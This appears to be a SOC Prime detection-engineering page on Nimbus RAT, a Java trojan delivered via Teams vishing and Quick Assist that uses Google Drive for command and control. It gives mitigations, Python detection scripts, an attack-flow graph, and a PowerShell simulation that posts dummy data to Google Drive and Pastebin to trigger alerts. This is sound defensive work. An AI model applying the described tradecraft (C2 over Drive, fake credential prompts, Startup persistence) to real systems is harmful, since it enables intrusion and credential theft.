SOC Prime Bias: Medium

05 Jun 2026 15:31 UTC

Nimbus RAT Delivered Through Microsoft Teams and Google Drive

Author: SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Threat actors used Microsoft Teams voice phishing together with Quick Assist to deploy a Java-based remote access trojan known as Nimbus RAT. The malware relies on Google Drive and Google Sheets as its command-and-control channels and includes its own bundled OpenJDK runtime. For credential theft, it uses either a fake Windows security prompt or the native CredUI API to capture user secrets.

Investigation

eSentire’s Threat Response Unit reconstructed the complete intrusion chain using mail-flow logs, endpoint telemetry, and static analysis of the Java malware. The campaign combined email bombing, a Teams-based vishing call, Quick Assist remote support, a Pastebin-hosted instruction sheet, and a compromised SharePoint tenant used to distribute the payload.

Mitigation

Recommended defenses include disabling external Teams messaging from unknown tenants, blocking Quick Assist where it is not required, alerting on spikes in email bombing activity, monitoring javaw.exe execution from unusual locations, and detecting suspicious Google Drive API calls initiated by unexpected processes.
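The two endpoint-side recommendations above (javaw.exe running from unusual locations, and Google Drive API traffic from processes that have no reason to generate it) as detection logic run over a few Sysmon-shaped events. This is an added example, not SOC Prime's or eSentire's code; the event field names, the list of expected JDK/JRE directories and the bundled-runtime path under C:\ProgramData\InboxCorePro are assumptions made for illustration.

```python
"""Endpoint-telemetry checks for the Nimbus RAT tradecraft described above.

Added example, not SOC Prime's or eSentire's code. The events below are
constructed, Sysmon-shaped dictionaries (EventID 1 = process create,
3 = network connect, 22 = DNS query); the field names and the bundled-JRE
path under C:\\ProgramData\\InboxCorePro are assumptions for illustration.
"""
import ntpath

# Directories from which a javaw.exe launch is expected on a managed host
# (assumed list; adjust to the organisation's actual JDK/JRE inventory).
EXPECTED_JAVA_DIRS = (
    "c:\\program files\\java\\",
    "c:\\program files (x86)\\java\\",
    "c:\\program files\\eclipse adoptium\\",
)

# Web services the page names as the RAT's C2, exfiltration and staging channels.
WATCHED_DOMAINS = ("googleapis.com", "drive.google.com", "pastebin.com")


def _is_javaw(event):
    return ntpath.basename(ntpath.normcase(event.get("Image", ""))) == "javaw.exe"


def javaw_from_unusual_path(event):
    """EventID 1: javaw.exe running from outside the expected JDK/JRE directories."""
    if event.get("EventID") != 1 or not _is_javaw(event):
        return False
    image = ntpath.normcase(event["Image"])
    return not image.startswith(EXPECTED_JAVA_DIRS)


def javaw_to_watched_domain(event):
    """EventID 3/22: javaw.exe resolving or connecting to a watched web service."""
    if event.get("EventID") not in (3, 22) or not _is_javaw(event):
        return False
    host = (event.get("QueryName") or event.get("DestinationHostname") or "").lower()
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def triage(events):
    """Per-event findings as (rule_name, ProcessId) tuples, in event order."""
    findings = []
    for ev in events:
        if javaw_from_unusual_path(ev):
            findings.append(("javaw_unusual_path", ev["ProcessId"]))
        if javaw_to_watched_domain(ev):
            findings.append(("javaw_c2_web_service", ev["ProcessId"]))
    return findings


def correlate(events):
    """ProcessIds that fired both rules: a Java runtime launched from a staging
    directory that also talks to the RAT's web-service channels."""
    by_rule = {}
    for rule, pid in triage(events):
        by_rule.setdefault(rule, set()).add(pid)
    return by_rule.get("javaw_unusual_path", set()) & by_rule.get("javaw_c2_web_service", set())


# Constructed sample telemetry: one legitimate JRE, one staged copy under ProgramData.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120,
     "Image": "C:\\Program Files\\Java\\jre-17\\bin\\javaw.exe",
     "CommandLine": "\"C:\\Program Files\\Java\\jre-17\\bin\\javaw.exe\" -jar C:\\Tools\\app.jar"},
    {"EventID": 1, "ProcessId": 5216,
     "Image": "C:\\ProgramData\\InboxCorePro\\jre\\bin\\javaw.exe",
     "CommandLine": "\"C:\\ProgramData\\InboxCorePro\\jre\\bin\\javaw.exe\" -jar C:\\ProgramData\\InboxCorePro\\InboxCorePro.jar"},
    {"EventID": 22, "ProcessId": 5216,
     "Image": "C:\\ProgramData\\InboxCorePro\\jre\\bin\\javaw.exe",
     "QueryName": "www.googleapis.com"},
    {"EventID": 3, "ProcessId": 7001,
     "Image": "C:\\Program Files\\Google\\Drive File Stream\\GoogleDriveFS.exe",
     "DestinationHostname": "www.googleapis.com"},
    {"EventID": 22, "ProcessId": 4120,
     "Image": "C:\\Program Files\\Java\\jre-17\\bin\\javaw.exe",
     "QueryName": "repo.maven.apache.org"},
]

if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
    print("high-confidence pids:", sorted(correlate(SAMPLE_EVENTS)))
```

Each rule on its own is noisy (developer workstations run javaw.exe from odd places; Drive File Stream talks to googleapis.com all day), which is why correlate() keys on the process id: a Java runtime that is both outside the inventory and talking to the RAT's channels is the pairing worth paging on.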

Response

If Nimbus RAT activity is detected, isolate the affected system, terminate all related javaw.exe processes, remove the C:\ProgramData\InboxCorePro directory and any associated startup shortcuts, and consider a full system reimage. Review Google Workspace audit logs as well to identify any unauthorized Google Drive application grants.
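The last response step, reviewing Google Workspace audit logs for unauthorized Drive application grants, as a small review script. This is an added example and not SOC Prime's or eSentire's code; the records are constructed and simplified, modelled on Workspace token audit events (authorize / revoke), and the field names used here (actor, client_id, app_name, scope) are an assumption that a real export would need to be mapped onto first.

```python
"""Review of Google Workspace OAuth grants for unexpected Drive access.

Added example, not SOC Prime's or eSentire's code. The grant records below
are constructed and simplified: they are modelled on Workspace "token"
audit events (authorize / revoke), but the field names used here
(actor, client_id, app_name, scope) are an assumption.
"""

# Scopes that give an app read or write access to Drive or Sheets content,
# the channels the page describes Nimbus RAT using.
DRIVE_SCOPES = {
    "https://www.googleapis.com/auth/drive",
    "https://www.googleapis.com/auth/drive.file",
    "https://www.googleapis.com/auth/drive.readonly",
    "https://www.googleapis.com/auth/spreadsheets",
}

# Client IDs the organisation has vetted (constructed placeholder value).
APPROVED_CLIENT_IDS = {"111111111111-approved-backup.apps.googleusercontent.com"}


def unapproved_drive_grants(grants):
    """Authorize events that hand a Drive/Sheets scope to a client not on the allowlist."""
    hits = []
    for g in grants:
        if g.get("event") != "authorize" or g.get("client_id") in APPROVED_CLIENT_IDS:
            continue
        granted = DRIVE_SCOPES.intersection(g.get("scope", []))
        if granted:
            hits.append({
                "time": g["time"],
                "actor": g["actor"],
                "client_id": g["client_id"],
                "app_name": g.get("app_name", ""),
                "scopes": sorted(granted),
            })
    return hits


def grants_still_active(grants):
    """(actor, client_id) pairs from unapproved Drive grants with no later revoke
    by the same actor: the grants the response step still has to remove."""
    ordered = sorted(grants, key=lambda g: g["time"])
    active = set()
    for g in ordered:
        key = (g["actor"], g["client_id"])
        if g.get("event") == "revoke":
            active.discard(key)
        elif unapproved_drive_grants([g]):
            active.add(key)
    return active


# Constructed sample records (ISO-8601 timestamps, sortable as strings).
SAMPLE_GRANTS = [
    {"time": "2026-06-01T09:12:00Z", "actor": "alice@example.com", "event": "authorize",
     "client_id": "111111111111-approved-backup.apps.googleusercontent.com",
     "app_name": "Corp Backup",
     "scope": ["https://www.googleapis.com/auth/drive.readonly"]},
    {"time": "2026-06-03T14:47:00Z", "actor": "bob@example.com", "event": "authorize",
     "client_id": "999999999999-unknown.apps.googleusercontent.com",
     "app_name": "Document Sync Helper",
     "scope": ["https://www.googleapis.com/auth/drive",
               "https://www.googleapis.com/auth/spreadsheets"]},
    {"time": "2026-06-03T15:02:00Z", "actor": "bob@example.com", "event": "authorize",
     "client_id": "555555555555-calendar.apps.googleusercontent.com",
     "app_name": "Calendar Sync",
     "scope": ["https://www.googleapis.com/auth/calendar"]},
    {"time": "2026-06-03T15:30:00Z", "actor": "carol@example.com", "event": "authorize",
     "client_id": "999999999999-unknown.apps.googleusercontent.com",
     "app_name": "Document Sync Helper",
     "scope": ["https://www.googleapis.com/auth/drive"]},
    {"time": "2026-06-04T08:00:00Z", "actor": "carol@example.com", "event": "revoke",
     "client_id": "999999999999-unknown.apps.googleusercontent.com",
     "app_name": "Document Sync Helper", "scope": []},
]

if __name__ == "__main__":
    for hit in unapproved_drive_grants(SAMPLE_GRANTS):
        print(hit)
    print("still active:", sorted(grants_still_active(SAMPLE_GRANTS)))
```

Grants by a service account the attacker owns never appear in the victim tenant's token log, so this review only catches the OAuth2 path; the allowlist is the control that keeps the list short enough to read during an incident.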

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef process fill:#ccccff
    classDef data fill:#e6e6e6

    %% Nodes – Actions
    action_phishing["<b>Action</b> – <b>T1566.003 Phishing: Spearphishing via Service</b><br/>Email bombing delivers subscription-confirmation messages that set up a later Microsoft Teams vishing call"]
    class action_phishing action
    action_trusted_rel["<b>Action</b> – <b>T1199 Trusted Relationship</b><br/>Attacker creates throwaway Microsoft 365 tenant or compromises a legitimate tenant to send malicious external Teams messages that appear trusted"]
    class action_trusted_rel action
    action_user_exec_file["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim is instructed via Pastebin to download a ZIP from a compromised SharePoint site and run the JAR file using javaw.exe"]
    class action_user_exec_file action
    action_user_exec_copy["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Attacker copies the Pastebin URL into the Teams chat, tricking the user into visiting the site"]
    class action_user_exec_copy action
    action_persistence["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution</b><br/>Persistence is achieved by importing a .reg file and placing a shortcut in the Startup folder that launches the Java RAT"]
    class action_persistence action
    action_credential_harvest["<b>Action</b> – <b>T1056.002 Input Capture: GUI Input Capture</b><br/>Nimbus RAT displays a fake Java Swing credential dialog and the native Windows CredUI prompt to capture credentials"]
    class action_credential_harvest action
    action_c2["<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/>Command and control performed over Google Drive using service-account or OAuth2 authentication with encrypted polling files"]
    class action_c2 action
    action_exfil["<b>Action</b> – <b>T1567.002 Exfiltration Over Web Service</b><br/>Collected data such as screenshots and files are uploaded to the same Google Drive folder used for C2"]
    class action_exfil action
    action_network_disc["<b>Action</b> – <b>T1016 System Network Configuration Discovery</b><br/>RAT executes commands like ipconfig /all to gather network interface details"]
    class action_network_disc action

    %% Nodes – Tools / Malware / Files / Processes
    tool_email_bomb["<b>Tool</b> – Name: Email bombing script"]
    class tool_email_bomb tool
    tool_teams["<b>Tool</b> – Name: Microsoft Teams (vishing)"]
    class tool_teams tool
    tool_sharepoint["<b>Tool</b> – Name: Compromised SharePoint site"]
    class tool_sharepoint tool
    malware_nimbus["<b>Malware</b> – Name: Nimbus RAT (Java)"]
    class malware_nimbus malware
    file_jar["<b>File</b> – Name: InboxCorePro.jar (Java payload)"]
    class file_jar data
    process_javaw["<b>Process</b> – Name: javaw.exe (executes JAR)"]
    class process_javaw process
    file_reg["<b>File</b> – Name: Registry import .reg"]
    class file_reg data
    file_startup["<b>File</b> – Name: Shortcut in Startup folder"]
    class file_startup data
    service_gdrive["<b>Service</b> – Name: Google Drive (C2 and exfil)"]
    class service_gdrive data
    process_ipconfig["<b>Process</b> – Command: ipconfig /all"]
    class process_ipconfig process

    %% Connections – Attack Flow
    action_phishing -->|uses| tool_email_bomb
    action_phishing -->|leads to| action_trusted_rel
    action_trusted_rel -->|uses| tool_teams
    action_trusted_rel -->|delivers| action_user_exec_copy
    action_user_exec_copy -->|provides link to| action_user_exec_file
    action_user_exec_file -->|downloads from| tool_sharepoint
    action_user_exec_file -->|executes| file_jar
    file_jar -->|run by| process_javaw
    process_javaw -->|launches| malware_nimbus
    malware_nimbus -->|creates| action_persistence
    action_persistence -->|imports| file_reg
    action_persistence -->|places| file_startup
    malware_nimbus -->|captures| action_credential_harvest
    malware_nimbus -->|communicates with| service_gdrive
    service_gdrive -->|supports| action_c2
    service_gdrive -->|supports| action_exfil
    malware_nimbus -->|performs| action_network_disc
    action_network_disc -->|runs| process_ipconfig

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The threat actor has already compromised the endpoint with the Nimbus RAT binary. To establish a covert C2 channel, the RAT issues two outbound HTTP POST requests:

    1. Google Drive API Call – uploads a small JSON payload to https://www.googleapis.com/drive/v3/files?uploadType=media, mimicking the RAT’s “download‑payload” behavior.
    2. Pastebin Paste – posts a base‑64‑encoded command string to https://pastebin.com/api/api_post.php using the public API key.

    Both requests are executed via PowerShell’s Invoke-WebRequest to ensure the firewall logs contain the domain field (googleapis.com and pastebin.com). The attacker runs the commands under the context of the compromised user to blend with normal activity.

  • Regression Test Script:

    # --------------------------------------------------------------
    # Nimbus RAT C2 Simulation – triggers Sigma rule on domain match
    # --------------------------------------------------------------

    # 1. Google Drive API mock upload (no authentication – the goal is the
    #    googleapis.com domain in firewall/proxy telemetry, not a successful upload)
    $googlePayload = @{ name = "dummy.txt"; mimeType = "text/plain" } | ConvertTo-Json
    $googleUri = "https://www.googleapis.com/drive/v3/files?uploadType=media"

    try {
        Invoke-WebRequest -Uri $googleUri -Method POST -Body $googlePayload `
            -ContentType "application/json" -UseBasicParsing -TimeoutSec 15 -ErrorAction Stop | Out-Null
        Write-Host "[+] Sent mock upload to Google Drive API"
    } catch {
        # An HTTP 401 from Google is the normal outcome; the request has already produced the telemetry
        Write-Warning "Google Drive request failed (expected in sandbox): $_"
    }

    # 2. Pastebin public API post (requires a developer key – using a placeholder).
    #    The command string is Base64-encoded, matching the narrative above.
    $pastebinKey   = "YOUR_PUBLIC_API_KEY"    # <-- replace with a valid key for real test
    $pastebinText  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("echo 'Simulated command from C2'"))
    $pastebinUri   = "https://pastebin.com/api/api_post.php"
    $pastebinBody  = @{
        api_dev_key       = $pastebinKey
        api_option        = "paste"
        api_paste_code    = $pastebinText
        api_paste_private = "1"
    }

    try {
        Invoke-WebRequest -Uri $pastebinUri -Method POST -Body $pastebinBody `
            -ContentType "application/x-www-form-urlencoded" -UseBasicParsing -TimeoutSec 15 -ErrorAction Stop | Out-Null
        Write-Host "[+] Posted mock command to Pastebin"
    } catch {
        # Pastebin rejects the placeholder key; as above, the domain telemetry is what matters
        Write-Warning "Pastebin request failed (expected in sandbox): $_"
    }

    # --------------------------------------------------------------
    # End of simulation
    # --------------------------------------------------------------

  • Cleanup Commands:

    # Remove any temporary files or variables used during the simulation
    Remove-Variable -Name googlePayload, googleUri, pastebinKey, pastebinText, pastebinUri, pastebinBody -ErrorAction SilentlyContinue
    Write-Host "[*] Cleanup complete."